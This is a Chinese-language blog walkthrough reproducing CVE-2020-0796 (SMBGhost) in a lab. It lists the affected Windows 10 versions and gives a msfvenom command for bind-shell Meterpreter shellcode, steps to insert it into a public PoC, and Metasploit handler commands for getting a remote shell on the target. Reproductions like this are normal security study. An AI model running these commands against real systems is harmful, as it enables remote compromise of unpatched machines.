漏洞复现|CVE-2020-0796(SMBv3远程代码执行)漏洞复现

2022-01-19 21:03:10 浏览数 (1)

目录

CVE-2020-0796

漏洞描述

漏洞危害等级

影响版本

漏洞复现

实现本地提权

CVE-2020-0796

漏洞描述

2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。

漏洞危害等级

影响版本

  • Windows 10 Version 1903 for 32-bit Systems
  • Windows 10 Version 1903 for x64-based Systems
  • Windows 10 Version 1903 for ARM64-based Systems
  • Windows Server, Version 1903 (Server Core installation)
  • Windows 10 Version 1909 for 32-bit Systems
  • Windows 10 Version 1909 for x64-based Systems
  • Windows 10 Version 1909 for ARM64-based Systems
  • Windows Server, Version 1909 (Server Core installation)

漏洞复现

  • 靶机:192.168.10.26(Win10 1903版本)
  • Kali攻击机:192.168.10.13

POC地址:https://github.com/chompie1337/SMBGhost_RCE_PoC

先检测目标是否存在该漏洞

使用 msfvenom 生成 python 类型正向连接的 shellcode

代码语言:javascript复制
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b 'x00' -i 1 -f python

将生成的 shellcode 替换 POC 中 exploit.py 里的USER_PAYLOAD字段,注意要将buf替换为USER_PAYLOAD

MSF启动监听

代码语言:javascript复制
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8888
set rhost 192.168.10.26
run

POC发起攻击,攻击成功

注意:在用POC打的过程中,极易出现蓝屏或重启的风险,使用时应注意!

实现本地提权

来源:谢公子的博客

责编:Zuo

0 人点赞